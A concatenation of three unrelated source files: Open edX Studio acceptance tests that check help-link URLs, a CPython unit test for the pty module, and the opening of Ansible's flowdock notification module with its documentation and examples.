And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'getting_started/get_started.html'
"""
self.assertTrue(self.dashboard_page.has_new_library_button)
click_css(self.dashboard_page, '#course-index-tabs .libraries-tab', 0, False)
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/getting_started/get_started.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.dashboard_page,
href=href
)
@attr(shard=10)
class LibraryHelpTest(StudioLibraryTest):
"""
Test help links on a Library page.
"""
def setUp(self):
super(LibraryHelpTest, self).setUp()
self.library_page = LibraryPage(self.browser, self.library_key)
self.library_user_page = LibraryUsersPage(self.browser, self.library_key)
def test_library_content_nav_help(self):
"""
Scenario: Help link in navigation bar is working on content
library page(click a library on the Library list page).
Given that I am on the content library page(click a library on the Library list page).
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'course/components/libraries.html'
"""
self.library_page.visit()
# The href we want to see in anchor help element.
href = "http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/" \
"en/latest/course_components/libraries.html"
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.library_page,
href=href
)
def test_library_content_side_bar_help(self):
"""
Scenario: Help link in sidebar links is working on
content library page(click a library on the Library list page).
Given that I am on the content library page(click a library on the Library list page).
And I want help about the process
And I click the 'Learn more about content libraries' in the sidebar links
Then Help link should open.
And help url should end with 'course/components/libraries.html'
"""
self.library_page.visit()
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/course_components/libraries.html'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.library_page,
href=href,
help_text='Learn more about content libraries'
)
def test_library_user_access_setting_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'User Access'
settings page of library.
Given that I am on the 'User Access' settings page of library.
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with
'creating_content/libraries.html#give-other-users-access-to-your-library'
"""
self.library_user_page.visit()
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/en/' \
'latest/course_components/libraries.html#give-other-users-access-to-your-library'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.library_user_page,
href=href
)
@attr(shard=10)
class LibraryImportHelpTest(StudioLibraryTest):
"""
Test help links on a Library import and export pages.
"""
def setUp(self):
super(LibraryImportHelpTest, self).setUp()
self.library_import_page = ImportLibraryPage(self.browser, self.library_key)
self.library_import_page.visit()
def test_library_import_nav_help(self):
"""
Scenario: Help link in navigation bar is working on Library import page.
Given that I am on the Library import page.
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'creating_content/libraries.html#import-a-library'
"""
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/en/' \
'latest/course_components/libraries.html#import-a-library'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.library_import_page,
href=href
)
def test_library_import_side_bar_help(self):
"""
Scenario: Help link in sidebar links is working on Library import page.
Given that I am on the Library import page.
And I want help about the process
And I click the 'Learn more about importing a library' in the sidebar links
Then Help link should open.
And help url should end with 'creating_content/libraries.html#import-a-library'
"""
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/en/' \
'latest/course_components/libraries.html#import-a-library'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.library_import_page,
href=href,
help_text='Learn more about importing a library'
)
@attr(shard=10)
class LibraryExportHelpTest(StudioLibraryTest):
"""
Test help links on a Library export pages.
"""
def setUp(self):
super(LibraryExportHelpTest, self).setUp()
self.library_export_page = ExportLibraryPage(self.browser, self.library_key)
self.library_export_page.visit()
def test_library_export_nav_help(self):
"""
Scenario: Help link in navigation bar is working on Library export page.
Given that I am on the Library export page.
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'creating_content/libraries.html#export-a-library'
"""
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/en/' \
'latest/course_components/libraries.html#export-a-library'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.library_export_page,
href=href
)
def test_library_export_side_bar_help(self):
"""
Scenario: Help link in sidebar links is working on Library export page.
Given that I am on the Library export page.
And I want help about the process
And I click the 'Learn more about exporting a library' in the sidebar links
Then Help link should open.
And help url should end with 'creating_content/libraries.html#export-a-library'
"""
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/en/' \
'latest/course_components/libraries.html#export-a-library'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.library_export_page,
href=href,
help_text='Learn more about exporting a library'
)
@attr(shard=10)
class NewProgramHelpTest(ProgramsConfigMixin, AcceptanceTest):
"""
Test help links on a 'New Program' page
"""
def setUp(self):
super(NewProgramHelpTest, self).setUp()
self.auth_page = AutoAuthPage(self.browser, staff=True)
self.program_page = DashboardPageWithPrograms(self.browser)
self.auth_page.visit()
self.set_programs_api_configuration(True)
self.program_page.visit()
def test_program_create_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'New Program' page
Given that I am on the 'New Program' page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'index.html'
"""
self.program_page.click_new_program_button()
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course' \
'/en/latest/index.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.program_page,
href=href,
)
@attr(shard=10)
class CourseOutlineHelpTest(StudioCourseTest):
"""
Tests help links on course outline page.
"""
def setUp(self): # pylint: disable=arguments-differ
super(CourseOutlineHelpTest, self).setUp()
self.course_outline_page = CourseOutlinePage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.course_outline_page.visit()
@skip("This scenario depends upon TNL-5460")
def test_course_outline_nav_help(self):
"""
Scenario: Help link in navigation bar is working on Course Outline page
Given that I am on the Course Outline page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'developing_course/course_outline.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course' \
'/en/latest/developing_course/course_outline.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.course_outline_page,
href=href
)
def test_course_outline_side_bar_help(self):
"""
Scenario: Help link in sidebar links is working on Course Outline page
Given that I am on the Course Outline page.
And I want help about the process
And I click the 'Learn more about the course outline' in the sidebar links
Then Help link should open.
And help url should end with 'developing_course/course_outline.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course' \
'/en/latest/developing_course/course_outline.html'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.course_outline_page,
href=href,
help_text='Learn more about the course outline',
index=0
)
@attr(shard=10)
class CourseUpdateHelpTest(StudioCourseTest):
"""
Test help links on Course Update page
"""
def setUp(self): # pylint: disable=arguments-differ
super(CourseUpdateHelpTest, self).setUp()
self.course_update_page = CourseUpdatesPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.course_update_page.visit()
def test_course_update_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Course Update' page
Given that I am on the 'Course Update' page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'course_assets/handouts_updates.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/course_assets/handouts_updates.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.course_update_page,
href=href
)
@attr(shard=10)
class AssetIndexHelpTest(StudioCourseTest):
"""
Test help links on Course 'Files & Uploads' page
"""
def setUp(self): # pylint: disable=arguments-differ
super(AssetIndexHelpTest, self).setUp()
self.course_asset_index_page = AssetIndexPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.course_asset_index_page.visit()
def test_asset_index_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Files & Uploads' page
Given that I am on the 'Files & Uploads' page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'course_assets/course_files.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/course_assets/course_files.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.course_asset_index_page,
href=href
)
def test_asset_index_side_bar_help(self):
"""
Scenario: Help link in sidebar links is working on 'Files & Uploads' page
Given that I am on the 'Files & Uploads' page.
And I want help about the process
And I click the 'Learn more about managing files' in the sidebar links
Then Help link should open.
And help url should end with 'course_assets/course_files.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/course_assets/course_files.html'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.course_asset_index_page,
href=href,
help_text='Learn more about managing files'
)
@attr(shard=10)
class CoursePagesHelpTest(StudioCourseTest):
"""
Test help links on Course 'Pages' page
"""
def setUp(self): # pylint: disable=arguments-differ
super(CoursePagesHelpTest, self).setUp()
self.course_pages_page = PagesPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.course_pages_page.visit()
def test_course_page_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Pages' page
Given that I am on the 'Pages' page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'course_assets/pages.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/course_assets/pages.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.course_pages_page,
href=href
)
@attr(shard=10)
class UploadTextbookHelpTest(StudioCourseTest):
"""
Test help links on Course 'Textbooks' page
"""
def setUp(self): # pylint: disable=arguments-differ
super(UploadTextbookHelpTest, self).setUp()
self.course_textbook_upload_page = TextbookUploadPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.course_textbook_upload_page.visit()
def test_course_textbook_upload_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Textbooks' page
Given that I am on the 'Textbooks' page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'course_assets/textbooks.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course' \
'/en/latest/course_assets/textbooks.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.course_textbook_upload_page,
href=href
)
def test_course_textbook_side_bar_help(self):
"""
Scenario: Help link in sidebar links is working on 'Textbooks' page
Given that I am on the 'Textbooks' page
And I want help about the process
And I click the 'Learn more about textbooks' in the sidebar links
Then Help link should open.
And help url should end with 'course_assets/textbooks.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course' \
'/en/latest/course_assets/textbooks.html'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.course_textbook_upload_page,
href=href,
help_text='Learn more about textbooks'
)
@attr(shard=10)
class StudioUnitHelpTest(ContainerBase):
"""
Tests help links on Unit page.
"""
def setUp(self, is_staff=True):
super(StudioUnitHelpTest, self).setUp(is_staff=is_staff)
def populate_course_fixture(self, course_fixture):
"""
Populates the course fixture.
We are modifying 'advanced_modules' setting of the
course.
Also add a section with a subsection and a unit.
"""
course_fixture.add_advanced_settings(
{u"advanced_modules": {"value": ["split_test"]}}
)
course_fixture.add_children(
XBlockFixtureDesc('chapter', 'Test Section').add_children(
XBlockFixtureDesc('sequential', 'Test Subsection').add_children(
XBlockFixtureDesc('vertical', 'Test Unit')
)
)
)
def test_unit_page_nav_help(self):
"""
Scenario: Help link in navigation bar is working on Unit page.
Given that I am on the Unit page.
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'developing_course/course_units.html'
"""
unit_page = self.go_to_unit_page()
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course' \
'/en/latest/developing_course/course_units.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=unit_page,
href=href
)
@attr(shard=10)
class SettingsHelpTest(StudioCourseTest):
"""
Tests help links on Schedule and Details Settings page
"""
def setUp(self, is_staff=False, test_xss=True):
super(SettingsHelpTest, self).setUp()
self.settings_page = SettingsPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.settings_page.visit()
def test_settings_page_nav_help(self):
"""
Scenario: Help link in navigation bar is working on Settings page.
Given that I am on the Settings page.
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'set_up_course/setting_up_student_view.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course' \
'/en/latest/set_up_course/setting_up_student_view.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.settings_page,
href=href
)
@attr(shard=10)
class GradingPageHelpTest(StudioCourseTest):
"""
Tests help links on Grading page
"""
def setUp(self, is_staff=False, test_xss=True):
super(GradingPageHelpTest, self).setUp()
self.grading_page = GradingPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.grading_page.visit()
def test_grading_page_nav_help(self):
"""
Scenario: Help link in navigation bar is working on Grading page.
Given that I am on the Grading page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'grading/index.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/grading/index.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.grading_page,
href=href
)
@attr(shard=10)
class CourseTeamSettingsHelpTest(StudioCourseTest):
"""
Tests help links on Course Team settings page
"""
def setUp(self, is_staff=False, test_xss=True):
super(CourseTeamSettingsHelpTest, self).setUp()
self.course_team_settings_page = CourseTeamPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.course_team_settings_page.visit()
def test_course_course_team_nav_help(self):
"""
Scenario: Help link in navigation bar is working on Course Team settings page
Given that I am on the Course Team settings page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'set_up_course/course_staffing.html#add-course-team-members'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/set_up_course/course_staffing.html#add-course-team-members'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.course_team_settings_page,
href=href
)
@attr(shard=10)
class CourseGroupConfigurationHelpTest(StudioCourseTest):
"""
Tests help links on course Group Configurations settings page
"""
def setUp(self, is_staff=False, test_xss=True):
super(CourseGroupConfigurationHelpTest, self).setUp()
self.course_group_configuration_page = GroupConfigurationsPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.course_group_configuration_page.visit()
def test_course_group_conf_nav_help(self):
"""
Scenario: Help link in navigation bar is working on
Group Configurations settings page
Given that I am on the Group Configurations settings page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'index.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/index.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.course_group_configuration_page,
href=href
)
def test_course_group_conf_content_group_side_bar_help(self):
"""
Scenario: Help link in side bar under the 'content group' is working
on Group Configurations settings page
Given that I am on the Group Configurations settings page
And I want help about the process
And I click the 'Learn More' in the sidebar links
Then Help link should open.
And help url should end with 'course_features/cohorts/cohorted_courseware.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/course_features/cohorts/cohorted_courseware.html'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.course_group_configuration_page,
href=href,
help_text='Learn More'
)
@attr(shard=10)
class AdvancedSettingHelpTest(StudioCourseTest):
"""
Tests help links on course Advanced Settings page.
"""
def setUp(self, is_staff=False, test_xss=True):
super(AdvancedSettingHelpTest, self).setUp()
self.advanced_settings = AdvancedSettingsPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.advanced_settings.visit()
def test_advanced_settings_nav_help(self):
"""
Scenario: Help link in navigation bar is working on Advanced Settings page.
Given that I am on the Advanced Settings page.
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'index.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course' \
'/en/latest/index.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.advanced_settings,
href=href
)
@attr(shard=10)
class CertificatePageHelpTest(StudioCourseTest):
"""
Tests help links on course Certificate settings page.
"""
def setUp(self, is_staff=False, test_xss=True):
super(CertificatePageHelpTest, self).setUp()
self.certificates_page = CertificatesPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.certificates_page.visit()
def test_certificate_page_nav_help(self):
"""
Scenario: Help link in navigation bar is working on Certificate settings page
Given that I am on the Certificate settings page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'set_up_course/creating_course_certificates.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course' \
'/en/latest/set_up_course/creating_course_certificates.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.certificates_page,
href=href
)
def test_certificate_page_side_bar_help(self):
"""
Scenario: Help link in side bar is working Certificate settings page
Given that I am on the Certificate settings page
And I want help about the process
And I click the 'Learn more about certificates' in the sidebar links
Then Help link should open.
And help url should end with 'set_up_course/creating_course_certificates.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course' \
'/en/latest/set_up_course/creating_course_certificates.html'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.certificates_page,
href=href,
help_text='Learn more about certificates',
)
@attr(shard=10)
class GroupExperimentConfigurationHelpTest(ContainerBase):
"""
Tests help links on course Group Configurations settings page
It is related to Experiment Group Configurations on the page.
"""
def setUp(self): # pylint: disable=arguments-differ
super(GroupExperimentConfigurationHelpTest, self).setUp()
self.group_configuration_page = GroupConfigurationsPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
# self.create_poorly_configured_split_instance()
self.group_configuration_page.visit()
def populate_course_fixture(self, course_fixture):
"""
Populates the course fixture.
We are modifying 'advanced_modules' setting of the
course.
"""
course_fixture.add_advanced_settings(
{u"advanced_modules": {"value": ["split_test"]}}
)
def test_course_group_configuration_experiment_side_bar_help(self):
"""
Scenario: Help link in side bar under the 'Experiment Group Configurations'
is working on Group Configurations settings page
Given that I am on the Group Configurations settings page
And I want help about the process
And I click the 'Learn More' in the sidebar links
Then Help link should open.
And help url should end with
'content_experiments_configure.html#set-up-group-configurations-in-edx-studio'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/en/latest/course_features' \
'/content_experiments/content_experiments_configure.html#set-up-group-configurations-in-edx-studio'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.group_configuration_page,
href=href,
help_text='Learn More',
)
@attr(shard=10)
class ToolsImportHelpTest(StudioCourseTest):
"""
Tests help links on tools import pages.
"""
def setUp(self, is_staff=False, test_xss=True):
super(ToolsImportHelpTest, self).setUp()
self.import_page = ImportCoursePage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.import_page.visit()
def test_tools_import_nav_help(self):
"""
Scenario: Help link in navigation bar is working on tools Library import page
Given that I am on the Library import tools page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'releasing_course/export_import_course.html#import-a-course'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/en/' \
'latest/releasing_course/export_import_course.html#import-a-course'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.import_page,
href=href
)
def test_tools_import_side_bar_help(self):
"""
Scenario: Help link in side bar is working on tools Library import page
Given that I am on the tools Library import page
And I want help about the process
And I click the 'Learn more about importing a course' in the sidebar links
Then Help link should open.
And help url should end with 'releasing_course/export_import_course.html#import-a-course'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/en/' \
'latest/releasing_course/export_import_course.html#import-a-course'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.import_page,
href=href,
help_text='Learn more about importing a course',
)
@attr(shard=10)
class ToolsExportHelpTest(StudioCourseTest):
"""
Tests help links on tools export pages.
"""
def setUp(self, is_staff=False, test_xss=True):
super(ToolsExportHelpTest, self).setUp()
self.export_page = ExportCoursePage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.export_page.visit()
def test_tools_import_nav_help(self):
"""
Scenario: Help link in navigation bar is working on tools Library export page
Given that I am on the Library export tools page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'releasing_course/export_import_course.html#export-a-course'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/en/' \
'latest/releasing_course/export_import_course.html#export-a-course'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.export_page,
href=href
)
def test_tools_import_side_bar_help(self):
"""
Scenario: Help link in side bar is working on tools Library export page
Given that I am on the tools Library import page
And I want help about the process
And I click the 'Learn more about exporting a course' in the sidebar links
Then Help link should open.
And help url should end with 'releasing_course/export_import_course.html#export-a-course'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/en/' \
'latest/releasing_course/export_import_course.html#export-a-course'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.export_page,
href=href,
help_text='Learn more about exporting a course',
)
@attr(shard=10)
class StudioWelcomeHelpTest(AcceptanceTest):
"""
Tests help link on 'Welcome' page ( User not logged in)
"""
def setUp(self):
super(StudioWelcomeHelpTest, self).setUp()
self.index_page = IndexPage(self.browser)
self.index_page.visit()
def test_welcome_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Welcome' page (User not logged in).
Given that I am on the 'Welcome' page.
And I want help about the edx
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should contain 'getting_started/get_started.html'
"""
# The url we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/getting_started/get_started.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.index_page,
href=href,
signed_in=False
)
| agpl-3.0 |
mancoast/CPythonPyc_test | cpython/265_test_pty.py | 58 | 7437 | import errno
import fcntl
import pty
import os
import sys
import signal
from test.test_support import verbose, TestSkipped, run_unittest
import unittest
TEST_STRING_1 = "I wish to buy a fish license.\n"
TEST_STRING_2 = "For my pet fish, Eric.\n"
if verbose:
def debug(msg):
print msg
else:
def debug(msg):
pass
def normalize_output(data):
# Some operating systems do conversions on newline. We could possibly
# fix that by doing the appropriate termios.tcsetattr()s. I couldn't
# figure out the right combo on Tru64 and I don't have an IRIX box.
# So just normalize the output and doc the problem O/Ses by allowing
# certain combinations for some platforms, but avoid allowing other
# differences (like extra whitespace, trailing garbage, etc.)
# This is about the best we can do without getting some feedback
# from someone more knowledgable.
# OSF/1 (Tru64) apparently turns \n into \r\r\n.
if data.endswith('\r\r\n'):
return data.replace('\r\r\n', '\n')
# IRIX apparently turns \n into \r\n.
if data.endswith('\r\n'):
return data.replace('\r\n', '\n')
return data
# Marginal testing of pty suite. Cannot do extensive 'do or fail' testing
# because pty code is not too portable.
# XXX(nnorwitz): these tests leak fds when there is an error.
class PtyTest(unittest.TestCase):
def setUp(self):
# isatty() and close() can hang on some platforms. Set an alarm
# before running the test to make sure we don't hang forever.
self.old_alarm = signal.signal(signal.SIGALRM, self.handle_sig)
signal.alarm(10)
def tearDown(self):
# remove alarm, restore old alarm handler
signal.alarm(0)
signal.signal(signal.SIGALRM, self.old_alarm)
def handle_sig(self, sig, frame):
self.fail("isatty hung")
def test_basic(self):
try:
debug("Calling master_open()")
master_fd, slave_name = pty.master_open()
debug("Got master_fd '%d', slave_name '%s'" %
(master_fd, slave_name))
debug("Calling slave_open(%r)" % (slave_name,))
slave_fd = pty.slave_open(slave_name)
debug("Got slave_fd '%d'" % slave_fd)
except OSError:
# " An optional feature could not be imported " ... ?
raise TestSkipped, "Pseudo-terminals (seemingly) not functional."
self.assertTrue(os.isatty(slave_fd), 'slave_fd is not a tty')
# Solaris requires reading the fd before anything is returned.
# My guess is that since we open and close the slave fd
# in master_open(), we need to read the EOF.
# Ensure the fd is non-blocking in case there's nothing to read.
orig_flags = fcntl.fcntl(master_fd, fcntl.F_GETFL)
fcntl.fcntl(master_fd, fcntl.F_SETFL, orig_flags | os.O_NONBLOCK)
try:
s1 = os.read(master_fd, 1024)
self.assertEquals('', s1)
except OSError, e:
if e.errno != errno.EAGAIN:
raise
# Restore the original flags.
fcntl.fcntl(master_fd, fcntl.F_SETFL, orig_flags)
debug("Writing to slave_fd")
os.write(slave_fd, TEST_STRING_1)
s1 = os.read(master_fd, 1024)
self.assertEquals('I wish to buy a fish license.\n',
normalize_output(s1))
debug("Writing chunked output")
os.write(slave_fd, TEST_STRING_2[:5])
os.write(slave_fd, TEST_STRING_2[5:])
s2 = os.read(master_fd, 1024)
self.assertEquals('For my pet fish, Eric.\n', normalize_output(s2))
os.close(slave_fd)
os.close(master_fd)
def test_fork(self):
debug("calling pty.fork()")
pid, master_fd = pty.fork()
if pid == pty.CHILD:
# stdout should be connected to a tty.
if not os.isatty(1):
debug("Child's fd 1 is not a tty?!")
os._exit(3)
# After pty.fork(), the child should already be a session leader.
# (on those systems that have that concept.)
debug("In child, calling os.setsid()")
try:
os.setsid()
except OSError:
# Good, we already were session leader
debug("Good: OSError was raised.")
pass
except AttributeError:
# Have pty, but not setsid()?
debug("No setsid() available?")
pass
except:
# We don't want this error to propagate, escaping the call to
# os._exit() and causing very peculiar behavior in the calling
# regrtest.py !
# Note: could add traceback printing here.
debug("An unexpected error was raised.")
os._exit(1)
else:
debug("os.setsid() succeeded! (bad!)")
os._exit(2)
os._exit(4)
else:
debug("Waiting for child (%d) to finish." % pid)
# In verbose mode, we have to consume the debug output from the
# child or the child will block, causing this test to hang in the
# parent's waitpid() call. The child blocks after a
# platform-dependent amount of data is written to its fd. On
# Linux 2.6, it's 4000 bytes and the child won't block, but on OS
# X even the small writes in the child above will block it. Also
# on Linux, the read() will throw an OSError (input/output error)
# when it tries to read past the end of the buffer but the child's
# already exited, so catch and discard those exceptions. It's not
# worth checking for EIO.
while True:
try:
data = os.read(master_fd, 80)
except OSError:
break
if not data:
break
sys.stdout.write(data.replace('\r\n', '\n'))
##line = os.read(master_fd, 80)
##lines = line.replace('\r\n', '\n').split('\n')
##if False and lines != ['In child, calling os.setsid()',
## 'Good: OSError was raised.', '']:
## raise TestFailed("Unexpected output from child: %r" % line)
(pid, status) = os.waitpid(pid, 0)
res = status >> 8
debug("Child (%d) exited with status %d (%d)." % (pid, res, status))
if res == 1:
self.fail("Child raised an unexpected exception in os.setsid()")
elif res == 2:
self.fail("pty.fork() failed to make child a session leader.")
elif res == 3:
self.fail("Child spawned by pty.fork() did not have a tty as stdout")
elif res != 4:
self.fail("pty.fork() failed for unknown reasons.")
##debug("Reading from master_fd now that the child has exited")
##try:
## s1 = os.read(master_fd, 1024)
##except os.error:
## pass
##else:
## raise TestFailed("Read from master_fd did not raise exception")
os.close(master_fd)
# pty.fork() passed.
def test_main(verbose=None):
run_unittest(PtyTest)
if __name__ == "__main__":
test_main()
| gpl-3.0 |
mzizzi/ansible | lib/ansible/modules/notification/flowdock.py | 16 | 6195 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2013 Matt Coddington <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: flowdock
version_added: "1.2"
author: "Matt Coddington (@mcodd)"
short_description: Send a message to a flowdock
description:
- Send a message to a flowdock team inbox or chat using the push API (see https://www.flowdock.com/api/team-inbox and https://www.flowdock.com/api/chat)
options:
token:
description:
- API token.
required: true
type:
description:
- Whether to post to 'inbox' or 'chat'
required: true
choices: [ "inbox", "chat" ]
msg:
description:
- Content of the message
required: true
tags:
description:
- tags of the message, separated by commas
required: false
external_user_name:
description:
- (chat only - required) Name of the "user" sending the message
required: false
from_address:
description:
- (inbox only - required) Email address of the message sender
required: false
source:
description:
- (inbox only - required) Human readable identifier of the application that uses the Flowdock API
required: false
subject:
description:
- (inbox only - required) Subject line of the message
required: false
from_name:
description:
- (inbox only) Name of the message sender
required: false
reply_to:
description:
- (inbox only) Email address for replies
required: false
project:
description:
- (inbox only) Human readable identifier for more detailed message categorization
required: false
link:
description:
- (inbox only) Link associated with the message. This will be used to link the message subject in Team Inbox.
required: false
validate_certs:
description:
- If C(no), SSL certificates will not be validated. This should only be used
on personally controlled sites using self-signed certificates.
required: false
default: 'yes'
choices: ['yes', 'no']
version_added: 1.5.1
requirements: [ ]
'''
EXAMPLES = '''
- flowdock:
type: inbox
token: AAAAAA
from_address: [email protected]
source: my cool app
msg: test from ansible
subject: test subject
- flowdock:
type: chat
token: AAAAAA
external_user_name: testuser
msg: test from ansible
tags: tag1,tag2,tag3
'''
from ansible.module_utils.six.moves.urllib.parse import urlencode
# ===========================================
# Module execution.
#
def main():
